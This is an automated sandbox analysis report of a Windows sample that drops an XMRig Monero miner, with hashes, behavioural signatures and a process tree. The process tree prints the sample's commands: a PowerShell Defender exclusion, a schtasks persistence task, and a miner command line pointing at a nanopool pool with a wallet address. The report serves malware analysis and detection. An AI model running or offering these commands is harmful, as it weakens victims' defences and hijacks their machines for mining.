Analysis
-
max time kernel
91s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
02-01-2023 21:27
Static task
static1
General
-
Target
e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe
-
Size
1.4MB
-
MD5
b31fe52d28bc99d02f48f391f7d2ce92
-
SHA1
beb093d4577a3fc4cb603e19623daacb01fab84f
-
SHA256
e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38
-
SHA512
da92a26b6ff4af57cca8b452eee2962d6e35cb05e417c3968989b6318535a310ac889c6841e00041b1cee19a0baa8d27ea8a6ce2e15acc6a9694393bf9dffba4
-
SSDEEP
24576:65CqYT6LgebcHTfOHnMQaUtX+m00BxvAU0LMy:ICqYTSgewHYnSUtu4TFpy
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
resource yara_rule behavioral1/memory/1752-159-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1752-160-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/1752-161-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1752-162-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1752-164-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1752-166-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5036 set thread context of 1752 5036 e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe 93 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4980 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 4992 powershell.exe 4992 powershell.exe 5036 e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 660 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 5036 e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe Token: SeDebugPrivilege 4992 powershell.exe Token: SeLockMemoryPrivilege 1752 vbc.exe Token: SeLockMemoryPrivilege 1752 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1752 vbc.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 5036 wrote to memory of 4992 5036 e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe 81 PID 5036 wrote to memory of 4992 5036 e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe 81 PID 5036 wrote to memory of 5048 5036 e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe 89 PID 5036 wrote to memory of 5048 5036 e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe 89 PID 5048 wrote to memory of 4980 5048 cmd.exe 91 PID 5048 wrote to memory of 4980 5048 cmd.exe 91 PID 5036 wrote to memory of 1752 5036 e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe 93 PID 5036 wrote to memory of 1752 5036 e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe 93 PID 5036 wrote to memory of 1752 5036 e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe 93 PID 5036 wrote to memory of 1752 5036 e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe 93 PID 5036 wrote to memory of 1752 5036 e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe 93 PID 5036 wrote to memory of 1752 5036 e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe 93 PID 5036 wrote to memory of 1752 5036 e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe 93 PID 5036 wrote to memory of 1752 5036 e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe 93 PID 5036 wrote to memory of 1752 5036 e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe 93 PID 5036 wrote to memory of 1752 5036 e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe 93 PID 5036 wrote to memory of 1752 5036 e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe 93 PID 5036 wrote to memory of 1752 5036 e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe 93 PID 5036 wrote to memory of 1752 5036 e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe 93 PID 5036 wrote to memory of 1752 5036 e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe"C:\Users\Admin\AppData\Local\Temp\e8faad746a67a36aa9f7ed61e3f4b96c51edc970d2fae896434c98f6412c1f38.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4992
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "WSEL" /tr "C:\ProgramData\7zip\WSEL.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "WSEL" /tr "C:\ProgramData\7zip\WSEL.exe"3⤵
- Creates scheduled task(s)
PID:4980
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1752
-